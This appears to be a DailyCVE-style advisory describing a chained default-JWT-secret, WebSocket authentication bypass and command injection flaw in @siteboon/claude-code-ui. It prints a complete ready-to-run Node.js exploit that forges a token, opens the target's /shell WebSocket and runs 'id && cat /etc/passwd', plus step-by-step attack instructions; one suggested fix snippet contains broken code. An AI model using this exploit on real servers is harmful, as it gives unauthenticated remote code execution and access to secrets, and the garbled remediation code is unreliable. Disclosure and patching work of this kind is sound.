Claude Code UI, OS Command Injection + Auth Bypass, CVE-2026-XXXXX (Critical)

Listen to this Post

Three chained vulnerabilities in @siteboon/claude-code-ui allow unauthenticated remote code execution (RCE). The chain begins with an insecure default JWT secret (CWE-1188). In server/middleware/auth.js, the `JWT_SECRET` constant falls back to a hardcoded string `’claude-ui-dev-secret-change-in-production’` if the environment variable is not set. Because this secret is not included in .env.example, most production deployments use this publicly known default value, enabling any attacker to forge valid JSON Web Tokens . The second flaw exists in the WebSocket authentication function `authenticateWebSocket()` (CWE-287). Unlike the REST API authentication, this function only verifies the JWT signature; it does not check if the `userId` from the token actually exists in the database. This allows a forged token with a fake `userId` to fully bypass WebSocket authentication . The final and most critical vulnerability is OS command injection (CWE-78) in the WebSocket shell handler at server/index.js:1179. User-supplied `projectPath` and `initialCommand` parameters are interpolated directly into a `bash -c` string without any sanitization. By chaining these vulnerabilities, an attacker can send a forged JWT token via WebSocket to execute arbitrary system commands on the server, achieving unauthenticated RCE .

dailycve form:

Platform: @siteboon/claude-code-ui
Version: <= 1.24.0
Vulnerability: JWT + WebSocket RCE
Severity: Critical
date: 2026-03-02

Prediction: Patch by 2026-06

What Undercode Say:

Analytics

  • Attack Vector: Network
  • Authentication: None required
  • User Interaction: None
  • Complexity: Low
  • Scope: Unchanged
  • Confidentiality Impact: High
  • Integrity Impact: High
  • Availability Impact: High

Bash Commands and Codes

1. Install required packages
npm install jsonwebtoken ws
2. Create exploit.js (PoC code)
cat > exploit.js << 'EOF'
import jwt from 'jsonwebtoken';
import WebSocket from 'ws';
// Step 1: Forge token with public default secret
const token = jwt.sign(
{ userId: 1337, username: 'attacker' },
'claude-ui-dev-secret-change-in-production'
);
// Step 2: Connect to shell WebSocket
const ws = new WebSocket(<code>ws://TARGET_HOST:3001/shell?token=${token}</code>);
ws.on('open', () => {
// Step 3: Inject command
ws.send(JSON.stringify({
type: 'init',
projectPath: '/tmp',
initialCommand: 'id && cat /etc/passwd',
isPlainShell: true,
hasSession: false
}));
});
ws.on('message', (data) => {
const msg = JSON.parse(data);
if (msg.type === 'output') process.stdout.write(msg.data);
});
EOF
3. Run the exploit
node exploit.js

How Exploit:

  1. Generate a valid JWT using the hardcoded default secret (claude-ui-dev-secret-change-in-production).
  2. Establish a WebSocket connection to the victim’s `/shell` endpoint, passing the forged token as a query parameter.
  3. Send a JSON message with type: 'init', including a malicious `initialCommand` (e.g., id && cat /etc/passwd).
  4. The server executes the command via `pty.spawn(‘bash’, [‘-c’, …])` and returns the output through the WebSocket.

Protection from this CVE

  1. Enforce JWT_SECRET: Remove the default fallback. The server should fail to start if `JWT_SECRET` is not explicitly set.
    const JWT_SECRET = process.env.JWT_SECRET;
    if (!JWT_SECRET) { process.exit(1); }
    
  2. Validate User in DB: Modify `authenticateWebSocket()` to query the database and ensure the `userId` exists.
  3. Use Safe Command Execution: Replace string interpolation with `spawn` and pass arguments as an array, using the `cwd` option for the working directory.
    const shellProcess = pty.spawn(initialCommand.split(' ')[bash], initialCommand.split(' ').slice(1), { cwd: projectPath });
    
  4. Add Token Expiration: Set an `expiresIn` value in generateToken().
  5. Restrict CORS: Configure CORS to allow only specific trusted origins.

Impact

  • Full remote code execution as the server process user.
  • Unauthorized read/write access to the server’s file system.
  • Theft of sensitive data, including SSH keys, environment variables, and API keys stored on the host.
  • Potential for lateral movement within the host’s internal network.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top